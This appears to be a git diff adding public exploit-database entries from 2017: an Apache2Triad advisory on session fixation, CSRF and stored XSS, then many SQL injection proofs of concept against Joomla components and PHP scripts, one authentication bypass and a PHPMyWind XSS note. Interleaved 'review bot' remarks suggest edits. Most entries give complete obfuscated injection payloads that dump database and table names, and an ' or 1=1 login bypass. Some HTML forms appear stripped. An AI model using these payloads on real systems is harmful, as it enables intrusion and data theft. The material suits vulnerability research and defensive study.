@@ -0,0 +1,208 @@ +[+] Credits: John Page AKA hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/APACHE2TRIAD-SERVER-STACK-v1.5.4-MULTIPLE-CVE.txt +[+] ISR: ApparitionSec + + +Vendor: +=============== +apache2triad.net +https://sourceforge.net/projects/apache2triad/ + + + +Product: +=========== +Apache2Triad v1.5.4 + +Apache2Triad spells instant and facile deployment of web software on any windows server along the lines of the WAMP paradigm +in a point and click manner in just minutes and is a ideal solution for the setup of server farms. + + + +Vulnerability Type(s): +====================== +Session Fixation +Cross Site Request Forgery +Persistent Cross Site Scripting + + +CVE Reference: +============== +CVE-2017-12965 (Session Fixation) +CVE-2017-12970 (Cross Site Request Forgery) +CVE-2017-12971 (Persistent Cross Site Scripting) + +This application is old and not actively developed according to the website, yet it is still avail for download so +I release the advisory. + + +Security Issue(S): +================ +CVE-2017-12965 + +Apache2Triad allows remote attackers to set an arbitrary PHPSESSID cookie, if a Apache2Triad user authenticates using the +attacker controlled PHPSESSID the attacker can then access the Apache2Triad Web application with same level of access +as that of the victim to potentially take over the Apache2Triad system. + +e.g. + +Pre - Authentication +a4ce6912be9d29a9ba4106c989859e7b + +Post - Authentication +a4ce6912be9d29a9ba4106c989859e7b + +We see the PHPSESSID is never regenerated, to make matters worse Apache2Triad will happily accept an abitrary attacker +supplied session cookie and persist it. Our evil cookie will get written here "C:\apache2triad\temp" as sess_HACKED123. + +set our cookie like, + +Attacker lure: +Important message + +Victim logs on using our lure. 
+ +HTTP 200 OK +Response cookies +PHPSESSID +value "HACKED123" +path "/" +Request cookies +PHPSESSID "HACKED123" + + +Since we control the PHP Session ID and it persists across applications we can then jump to "phpxmail" +using above session and have an authenticated session avail to do whatever we wish. + +e.g. + +http://VICTIM-IP/phpxmail/?PHPSESSID=HACKED123 + +Now access some arbitrary application resource bypassing normal authentication. +http://VICTIM-IP/phpxmail/main.php?action=servercmd + +Tested successfully in Firefox, IE + + +CVE-2017-12970 + +Remote attackers who can trick an authenticated Apache2Triad user to visit a malicious webpage or link can execute HTTP Requests +on behalf of the authenticated user, attackers can then add or delete arbitrary users to the affected system. + +Tested successfully in Firefox, IE + + +CVE-2017-12971 + +Remote attackers can execute arbitrary code that will run in the security context of the victims browser, if +an authenticated user visits an attacker controlled webpage or link. + +Since Apache2Triad has Session Fixation flaw, we can leverage this to potentially bypass normal authentication. +XSS payload will get written to the "slimftpd.conf" configuration file under "C:\apache2triad\ftp" directory. + +e.g. + +"> + + + + +Tested successfully in Firefox + + +Exploit/POC(s): +============== +CVE-2017-12965 (Session Fixation) + +1) Create lure with a attacker controlled PHPSESSID, something like... + +You have new messages, logon to view + +2) Authenticate to Apache2Triad using that link + +3) Open another Web Browser using above attacker supplied link. You can now access the vulnerable +application using same PHPSESSID session cookie from another browser. + + +CVE-2017-12970 (CSRF) + +Add user + +
+ + + +
+ +HTTP Response: +"The account PWNU was sucesfully created" + +Create password + +
+ + + + + + +
+ +HTTP Response: +"The account PWNU was sucesfully updated" + + +Delete users + +
+ + + +
+ +HTTP Response: +"The account PWNU was sucesfully deleted" + + +CVE-2017-12971 (XSS) + +
+ + + +
+ + +HTTP Response example: +"PHPSESSID=HACKED123" + + +Network Access: +=============== +Remote + + + +Severity: +========= +High + + + +Disclosure Timeline: +============================= +Vendor Notification: "No longer being maintained" +August 21, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/42524.txt b/platforms/php/webapps/42524.txt new file mode 100755 index 000000000..1b2f4ef9a --- /dev/null +++ b/platforms/php/webapps/42524.txt 
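Review bot: The Session Fixation section states that PHPSESSID is never regenerated after login and that an arbitrary client-supplied id is accepted and persisted, but the advisory never names the server-side controls that close either half, which is the part a defender reading the database needs. A remediation line such as `Mitigation: regenerate the session id on successful authentication (session_regenerate_id(true)) and enable session.use_strict_mode so uninitialized session ids are rejected rather than adopted.` would fit under the Security Issue(s) heading. The CSRF and XSS sections could likewise state the missing controls (presumably an anti-CSRF token on the add/update/delete actions and output encoding of the value written to slimftpd.conf — inferred from the descriptions, to be confirmed). The PoC forms between the "Add user", "Create password", "Delete users" and XSS headings appear to have lost their HTML in this rendering, so those sections read as empty.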
@@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Joomla! Component Flip Wall 8.0 - SQL Injection +# Dork: N/A +# Date: 21.08.2017 +# Vendor Homepage: http://pulseextensions.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/flip-wall/ +# Demo: http://demo.pulseextensions.com/flip-wall-component-demo/ +# Version: 8.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?option=com_flipwall&task=click&wallid=[SQL] +# +# 811+aND(/*!11166sELeCT*/+0x30783331+/*!11166FrOM*/+(/*!11166SeLeCT*/+cOUNT(*),/*!11166CoNCaT*/((sELEcT(sELECT+/*!11166CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1 +# +# Etc.. +# # # # # diff --git a/platforms/php/webapps/42525.txt b/platforms/php/webapps/42525.txt new file mode 100755 index 000000000..e6290b289 --- /dev/null +++ b/platforms/php/webapps/42525.txt 
@@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Joomla! Component Sponsor Wall 8.0 - SQL Injection +# Dork: N/A +# Date: 21.08.2017 +# Vendor Homepage: http://pulseextensions.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/sponsor-wall/ +# Demo: http://demo.pulseextensions.com/sponsor-wall-component-demo/ +# Version: 8.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?option=com_sponsorwall&task=click&wallid=[SQL] +# +# 86+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1 +# +# Etc.. +# # # # # diff --git a/platforms/php/webapps/42526.txt b/platforms/php/webapps/42526.txt new file mode 100755 index 000000000..5e10fcd72 --- /dev/null +++ b/platforms/php/webapps/42526.txt 
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: PHP Classifieds Script 5.6.2 SQL Injection
+# Dork: N/A
+# Date: 21.08.2017
+# Vendor Homepage: https://scriptoffice.com/
+# Software Link: https://soft.scriptoffice.com/projects/classifiedscript/wiki/Main_Menu
+# Demo: http://www.classifieddemo.com/
+# Version: 5.6.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/[SQL]/
+#
+# http://localhost/[PATH]/category/[SQL]/
+#
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42527.txt b/platforms/php/webapps/42527.txt
new file mode 100755
index 000000000..7d02bfc06
--- /dev/null
+++ b/platforms/php/webapps/42527.txt
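Review bot: The `Exploit Title` line reads `PHP Classifieds Script 5.6.2 SQL Injection` without the ` - ` separator that every other header in this commit, and the files.csv row for 42526 in the earlier hunk, place between product/version and vulnerability class; `# Exploit Title: PHP Classifieds Script 5.6.2 - SQL Injection` keeps the file and the index consistent. 42527.txt in the next hunk has the same omission (`Affiliate Niche Script 3.4.0 SQL Injection`). The Description line is the generic template sentence and does not say which parameter or path segment is injectable; naming it (the PoC suggests the first path segment and the `category/` segment, to be confirmed) would make the entry searchable.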
@@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Affiliate Niche Script 3.4.0 SQL Injection +# Dork: N/A +# Date: 21.08.2017 +# Vendor Homepage: https://scriptoffice.com/ +# Software Link: https://soft.scriptoffice.com/projects/affiliatenichescript/wiki/Main_Menu +# Demo: http://demodesigns.affiliatenichescript.com/ +# Version: 3.4.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/default_blue/Appliances/Categories/[SQL]/ +# +# 1'+uNiOn+sElEct+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x3c48313e494853414e2053454e43414e3c2f48313e,0x283929,0x28313029,0x28313129,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229+--+-/ +# +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42528.txt b/platforms/php/webapps/42528.txt new file mode 100755 index 000000000..c7c1efe5c --- /dev/null +++ b/platforms/php/webapps/42528.txt 
@@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: PHP Coupon Script 6.0 - 'cid' Parameter SQL Injection +# Dork: N/A +# Date: 21.08.2017 +# Vendor Homepage: http://www.couponscript.com/ +# Software Link: http://www.couponscript.com/ +# Demo: http://www.couponscript.com/demo/ +# Version: 6.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?page=cat&cid=[SQL] +# +# 34'+/*!00000Procedure*/+/*!00000Analyse*/+(extractvalue(0,/*!00000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)--+- +# +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42529.txt b/platforms/php/webapps/42529.txt new file mode 100755 index 000000000..ff82c77ca --- /dev/null +++ b/platforms/php/webapps/42529.txt 
@@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: iTech Social Networking Script 3.08 - SQL Injection +# Dork: N/A +# Date: 21.08.2017 +# Vendor Homepage: http://itechscripts.com/ +# Software Link: http://itechscripts.com/social-networking-script/ +# Demo: http://social.itechscripts.com +# Version: 3.08 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows the users to inject sql commands ... +# +# Proof of Concept: +# +# http://localhost/[PATH]/timeline.php?token=[SQL] +# +# -5458c74d97b01eae257e44aa9d5bade97baf'++uNiOn+sElEct+(/*!00000SeLect*/(@x)/*!00000fRom*/(/*!00000select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!00000select*/(0)/*!00000from*/(information_schema.columns)/*!00000where*/(table_schema=database())and(0x00)in(@x:=/*!00000CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!00000CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629+--+- +# +# http://localhost/[PATH]/photos_of_you.php?token=[SQL] +# +# Etc... +# # # # # \ No newline at end of file 
diff --git a/platforms/php/webapps/42530.txt b/platforms/php/webapps/42530.txt
new file mode 100755
index 000000000..03b5e34c5
--- /dev/null
+++ b/platforms/php/webapps/42530.txt
@@ -0,0 +1,26 @@
+# # # # #
+# Exploit Title: Joomla! Component FocalPoint Pro / Free v1.2.3 - SQL Injection
+# Dork: N/A
+# Date: 21.08.2017
+# Vendor Homepage: http://focalpointx.com/
+# Software Link: http://focalpointx.com/demos/focalpoint-pro
+# Demo: http://focalpointx.com/demos/focalpoint-free/
+# Demo: http://focalpointx.com/demos/focalpoint-pro
+# Version: 1.2.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?option=com_focalpoint&view=location&id=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42531.txt b/platforms/php/webapps/42531.txt
new file mode 100755
index 000000000..d52f8d34d
--- /dev/null
+++ b/platforms/php/webapps/42531.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Bitcoin,Dogecoin Mining 1.0 - Authentication Bypass
+# Dork: N/A
+# Date: 21.08.2017
+# Vendor Homepage: https://codecanyon.net/user/bousague
+# Software Link: https://codecanyon.net/item/bitcoindogecoin-mining-php-script/20315581
+# Demo: http://test.z-files.site/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to access the user panel and administration panel ...
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/
+# http://localhost/[PATH]/admincqqq
+# User: anything Pass: 'or 1=1 or ''='
+#
+# Etc...
+# # # # #
\ No newline at end of file
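Review bot: The `Exploit Title` in 42531.txt (`Bitcoin,Dogecoin Mining 1.0 - Authentication Bypass`) does not match the files.csv row added for it earlier in this commit (`Php Cloud mining Script - Authentication Bypass`), so a reader searching the index by the product name in the file, or the file by the name in the index, finds nothing. The file's header names both product and version, so the CSV row is the likelier one to correct: `42531,platforms/php/webapps/42531.txt,"Bitcoin,Dogecoin Mining 1.0 - Authentication Bypass",…` (the embedded comma is already quoted). The 42530.txt title in the same physical line carries `Pro / Free v1.2.3` while its CSV row says `FocalPoint 1.2.3`; that one is a smaller drift but worth aligning in the same pass.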
diff --git a/platforms/php/webapps/42532.txt b/platforms/php/webapps/42532.txt new file mode 100755 index 000000000..762b98603 --- /dev/null +++ b/platforms/php/webapps/42532.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Joomla! Component Ajax Quiz 1.8 - SQL Injection +# Dork: N/A +# Date: 21.08.2017 +# Vendor Homepage: http://webkul.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/ajaxquiz/ +# Demo: http://joomla30.webkul.com/ajaxquiz/ +# Version: 1.8 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?option=com_ajaxquiz&view=ajaxquiz&cid=[SQL] +# +# 60+union+select+(/*!00000SeLect*/(@x)/*!00000fRom*/(/*!00000select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!00000select*/(0)/*!00000from*/(information_schema.columns)/*!00000where*/(table_schema=database())and(0x00)in(@x:=/*!00000CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!00000CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number+1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z+1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)--+- +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42533.txt b/platforms/php/webapps/42533.txt new file mode 100755 index 000000000..7289c8dc7 --- /dev/null +++ b/platforms/php/webapps/42533.txt 
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: PHP-Lance 1.52 - 'subcat' Parameter SQL Injection
+# Dork: N/A
+# Date: 21.08.2017
+# Vendor Homepage: http://www.scriptdemo.com/
+# Software Link: http://www.scriptdemo.com/details/phplance/
+# Demo: http://www.scriptdemo.com/php-lance/
+# Version: 1.52
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/show.php?catid=1&subcat=[SQL]
+#
+# -1'+unIon(SELEct+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,(/*!00000SeLect*/(@x)/*!00000fRom*/(/*!00000select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!00000select*/(0)/*!00000from*/(information_schema.columns)/*!00000where*/(table_schema=database())and(0x00)in(@x:=/*!00000CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!00000CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283929,0x28313029)--+-
+#
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42534.txt b/platforms/php/webapps/42534.txt
new file mode 100755
index 000000000..3412989da
--- /dev/null
+++ b/platforms/php/webapps/42534.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: PHP Jokesite 2.0 - 'joke_id' Parameter SQL Injection
+# Dork: N/A
+# Date: 21.08.2017
+# Vendor Homepage: http://www.scriptdemo.com/
+# Software Link: http://www.scriptdemo.com/details/phpjokesite2/
+# Demo: http://www.scriptdemo.com/php-jokesite/ver2.0/
+# Version: 2.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/print.php?joke_id=[SQL]
+#
+# -230'+unIon(SELEct+0x283129,0x283229,0x3c68313e494853414e2053454e43414e3c2f68313e,0x283429,0x283529,(/*!00000SeLect*/(@x)/*!00000fRom*/(/*!00000select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!00000select*/(0)/*!00000from*/(information_schema.columns)/*!00000where*/(table_schema=database())and(0x00)in(@x:=/*!00000CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!00000CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329)--+-
+#
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42535.txt b/platforms/php/webapps/42535.txt
new file mode 100755
index 000000000..adc386093
--- /dev/null
+++ b/platforms/php/webapps/42535.txt
@@ -0,0 +1,68 @@ +Exploit Title:PHPMyWind 5.3 has XSS +Exploit Author:小雨 +Vendor Homepage:http://phpmywind.com +Software Link:http://phpmywind.com/downloads/PHPMyWind_5.3.zip +Version:5.3 +CVE:CVE-2017-12984 + + +$r= $dosql->GetOne("SELECT Max(orderid) AS orderid FROM `#@__message`"); + $orderid= (empty($r['orderid']) ? 1 : ($r['orderid'] + 1)); + $nickname= htmlspecialchars($nickname);//游客(xxx) + $contact= htmlspecialchars($contact); //联系方式 + $content= htmlspecialchars($content); //留言内容 + + $posttime= GetMkTime(time()); + $ip= gethostbyname($_SERVER['REMOTE_ADDR']); + + + $sql= "INSERT INTO `#@__message` (siteid, nickname, contact, content, orderid, posttime, htop, rtop, checkinfo, ip) VALUES (1, '$nickname', '$contact', '$content', '$orderid', '$posttime', '', '', 'false', '$ip')"; + if($dosql->ExecNoneQuery($sql)) + { + ShowMsg('留言成功,感谢您的支持!','message.php'); + exit(); + } + } +可以看出使用htmlspecialchars进行过滤,带入库中. +跟进content参数。 +127.0.0.1/PHPMyWind_5.3/admin/ message_update.php + + + + + +修改留言 + + + + + + + +GetOne("SELECT * FROM `#@__message` WHERE `id`=$id"); +?> +
修改留言 刷新
+
+ + + + + + + + + + + +
用户名:
联系方式:
留言内容: +